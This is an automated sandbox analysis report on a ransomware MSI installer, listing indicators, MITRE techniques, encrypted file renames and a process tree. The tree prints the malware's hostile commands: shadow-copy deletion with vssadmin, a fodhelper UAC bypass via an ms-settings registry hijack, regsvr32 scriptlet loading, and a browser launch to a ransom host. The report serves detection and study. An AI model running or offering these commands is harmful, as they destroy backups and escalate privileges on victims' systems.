4c7314083933a283c87dc28abbed3082040f12e92edac47ff72f8539af6e3ea1

Analysis

max time kernel
147s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 03:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

66.msi
Size

96KB
MD5

5d4e40d1d41c4588fbf7065fa85454e7
SHA1

ca876c335ef0a4d90b456f13cc975c04016a5cc1
SHA256

4c7314083933a283c87dc28abbed3082040f12e92edac47ff72f8539af6e3ea1
SHA512

5f86b37bbdd97ec632e0098d5c2ff71c0a23f547a27493d88d5a0cfa0342e45c39fc79ddbb42e4103a08e7e8a71b88412ca45cbb3b1aed615fdbe4c50d647f3c

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\BackupApprove.raw => C:\Users\Admin\Pictures\BackupApprove.raw.xqvpjsclg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\GetOptimize.crw => C:\Users\Admin\Pictures\GetOptimize.crw.xqvpjsclg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\UpdateJoin.png => C:\Users\Admin\Pictures\UpdateJoin.png.xqvpjsclg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\DenyAdd.crw => C:\Users\Admin\Pictures\DenyAdd.crw.xqvpjsclg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\InstallBackup.raw => C:\Users\Admin\Pictures\InstallBackup.raw.xqvpjsclg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\CompressSwitch.tif => C:\Users\Admin\Pictures\CompressSwitch.tif.xqvpjsclg	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\EditStart.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\EditStart.tiff => C:\Users\Admin\Pictures\EditStart.tiff.xqvpjsclg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\GrantUninstall.tif => C:\Users\Admin\Pictures\GrantUninstall.tif.xqvpjsclg	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

928 MsiExec.exe

pid	process
928	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 928 set thread context of 2648	928	MsiExec.exe	sihost.exe
PID 928 set thread context of 2716	928	MsiExec.exe	svchost.exe
PID 928 set thread context of 2792	928	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\bed09973-71fe-469f-9197-1b9db5615ee3.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523054346.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\e56d4c9.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{1FB7F52F-AE2D-47D5-93EC-49261060D88C}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID94F.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID5C3.tmp	msiexec.exe
File created	C:\Windows\Installer\e56d4cb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e56d4c9.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e111c2ed168134740000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e111c2ed0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900e111c2ed000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e111c2ed00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e111c2ed00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

5876 vssadmin.exe
5912 vssadmin.exe
3668 vssadmin.exe
2712 vssadmin.exe
4356 vssadmin.exe
5836 vssadmin.exe

pid	process
5876	vssadmin.exe
5912	vssadmin.exe
3668	vssadmin.exe
2712	vssadmin.exe
4356	vssadmin.exe
5836	vssadmin.exe

Modifies registry class 15 IoCs

Processes:

regsvr32.exesihost.exeregsvr32.exemsedge.exeregsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b"	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
4936	msiexec.exe
4936	msiexec.exe
928	MsiExec.exe
928	MsiExec.exe
376	msedge.exe
376	msedge.exe
1344	msedge.exe
1344	msedge.exe
1508	identity_helper.exe
1508	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

928 MsiExec.exe
928 MsiExec.exe
928 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

1344 msedge.exe
1344 msedge.exe
1344 msedge.exe
1344 msedge.exe
1344 msedge.exe

pid	process
928	MsiExec.exe
928	MsiExec.exe
928	MsiExec.exe

pid	process
1344	msedge.exe
1344	msedge.exe
1344	msedge.exe
1344	msedge.exe
1344	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	3124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3124	msiexec.exe
Token: SeSecurityPrivilege	4936	msiexec.exe
Token: SeCreateTokenPrivilege	3124	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3124	msiexec.exe
Token: SeLockMemoryPrivilege	3124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3124	msiexec.exe
Token: SeMachineAccountPrivilege	3124	msiexec.exe
Token: SeTcbPrivilege	3124	msiexec.exe
Token: SeSecurityPrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeLoadDriverPrivilege	3124	msiexec.exe
Token: SeSystemProfilePrivilege	3124	msiexec.exe
Token: SeSystemtimePrivilege	3124	msiexec.exe
Token: SeProfSingleProcessPrivilege	3124	msiexec.exe
Token: SeIncBasePriorityPrivilege	3124	msiexec.exe
Token: SeCreatePagefilePrivilege	3124	msiexec.exe
Token: SeCreatePermanentPrivilege	3124	msiexec.exe
Token: SeBackupPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeShutdownPrivilege	3124	msiexec.exe
Token: SeDebugPrivilege	3124	msiexec.exe
Token: SeAuditPrivilege	3124	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3124	msiexec.exe
Token: SeChangeNotifyPrivilege	3124	msiexec.exe
Token: SeRemoteShutdownPrivilege	3124	msiexec.exe
Token: SeUndockPrivilege	3124	msiexec.exe
Token: SeSyncAgentPrivilege	3124	msiexec.exe
Token: SeEnableDelegationPrivilege	3124	msiexec.exe
Token: SeManageVolumePrivilege	3124	msiexec.exe
Token: SeImpersonatePrivilege	3124	msiexec.exe
Token: SeCreateGlobalPrivilege	3124	msiexec.exe
Token: SeBackupPrivilege	2244	vssvc.exe
Token: SeRestorePrivilege	2244	vssvc.exe
Token: SeAuditPrivilege	2244	vssvc.exe
Token: SeBackupPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

msiexec.exemsedge.exe

pid process

3124 msiexec.exe
3124 msiexec.exe
1344 msedge.exe
1344 msedge.exe
1344 msedge.exe

pid	process
3124	msiexec.exe
3124	msiexec.exe
1344	msedge.exe
1344	msedge.exe
1344	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 4936 wrote to memory of 2224	4936	msiexec.exe	srtasks.exe
PID 4936 wrote to memory of 2224	4936	msiexec.exe	srtasks.exe
PID 4936 wrote to memory of 928	4936	msiexec.exe	MsiExec.exe
PID 4936 wrote to memory of 928	4936	msiexec.exe	MsiExec.exe
PID 2648 wrote to memory of 748	2648	sihost.exe	regsvr32.exe
PID 2648 wrote to memory of 748	2648	sihost.exe	regsvr32.exe
PID 2716 wrote to memory of 4468	2716	svchost.exe	regsvr32.exe
PID 2716 wrote to memory of 4468	2716	svchost.exe	regsvr32.exe
PID 2792 wrote to memory of 4520	2792	taskhostw.exe	regsvr32.exe
PID 2792 wrote to memory of 4520	2792	taskhostw.exe	regsvr32.exe
PID 928 wrote to memory of 956	928	MsiExec.exe	cmd.exe
PID 928 wrote to memory of 956	928	MsiExec.exe	cmd.exe
PID 956 wrote to memory of 1344	956	cmd.exe	msedge.exe
PID 956 wrote to memory of 1344	956	cmd.exe	msedge.exe
PID 1344 wrote to memory of 2288	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 2288	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1048	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 376	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 376	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1308	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1308	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1308	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1308	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1308	1344	msedge.exe	msedge.exe
PID 1344 wrote to memory of 1308	1344	msedge.exe	msedge.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3
2⤵
- Modifies registry class
PID:4468

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:2736

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:3124

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b
4⤵
PID:4784

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:4356

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:5436

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:5572

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b
4⤵
PID:5712

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:5876

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3
2⤵
- Modifies registry class
PID:748

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:320

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:3416

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b
4⤵
PID:4484

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:3668

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:5420

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:5560

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b
4⤵
PID:5700

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:5836

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3
2⤵
- Modifies registry class
PID:4520

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:4828

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:1508

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b
4⤵
PID:3132

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2712

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:5428

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:5608

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b
4⤵
PID:5740

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:5912

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\66.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3124

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:2224

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding D5407ADCBB0E3C6AB912816C76408940
2⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:928

C:\Windows\System32\cmd.exe
cmd /c "start microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg^&1^&38633491^&78^&399^&2219041
3⤵
- Suspicious use of WriteProcessMemory
PID:956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg&1&38633491&78&399&2219041
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a07746f8,0x7ff8a0774708,0x7ff8a0774718
5⤵
PID:2288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
5⤵
PID:1048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
